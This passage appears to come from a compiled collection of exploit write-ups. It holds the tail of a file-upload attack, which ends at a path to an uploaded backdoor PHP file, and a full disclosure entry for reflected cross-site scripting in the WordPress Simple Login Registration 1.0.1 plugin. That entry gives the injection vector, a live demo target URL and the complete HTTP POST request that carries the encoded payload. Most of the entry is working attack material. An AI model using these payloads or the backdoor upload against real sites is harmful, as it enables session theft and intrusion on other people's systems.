  5. Result Upload At http://site-target/album_gallery/Your_Backdoor.php
  ==========================================================================================
  24. Description : WordPress Simple Login Registration version 1.0.1 suffers from a cross site scripting vulnerability.
  Author : Dylan Irzi
  Source : WordPress Simple Login Registration 1.0.1 Cross Site Scripting ≈ Packet Storm
  Code :
  ###########################################################################################
  # Exploit Title: Cross Site Scripting WP Simple Login Registration 1.0.1 - Wordpress
  # Date: 26 August 2013
  # Exploit Author: Dylan Irzi
  # Credit goes to: websecuritydev.com
  # Vendor Homepage: http://envato.dropntheme.com/wp-simple-login-registration-plugin/
  # Tested on: Win8 & Linux Mint
  # Affected Version : 1.01 and later.
  ###########################################################################################
  Timeline:
  - 20 August: XSS found and reported.
  - 25 August: Vendor replies that the vulnerability is due to PHP.INI
  - 26 August: Disclosure!!
  ------------------------------------------------------------------------------------------
  The login fields are vulnerable to reflected Cross Site Scripting via POST.
  <input id="username" class="text-input" type="text" value="Vector XSS" name="username">
  <input type="password" class="text-input" id="password" name="password">
  Vector: ""><img src=x onerror=prompt(/XSS/);>>
  Example: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/
  HTTP live request.
  ------------------------------------------------------------------------------------------
  Host: envato.dropntheme.com
  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.18
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Referer: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 252
  POST: username=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&password=&remember-me=forever&submit=Log+in&login_nonce_field=a72b0d3cb6&_wp_http_referer=%2Fwp-simple-login-registration-plugin%2Flive-demo%2Flogin%2F&wpslrp_action=ddsfeu_login
  ------------------------------------------------------------------------------------------
  *By Dylan Irzi @Dylan_Irzi11 Security Pentest.*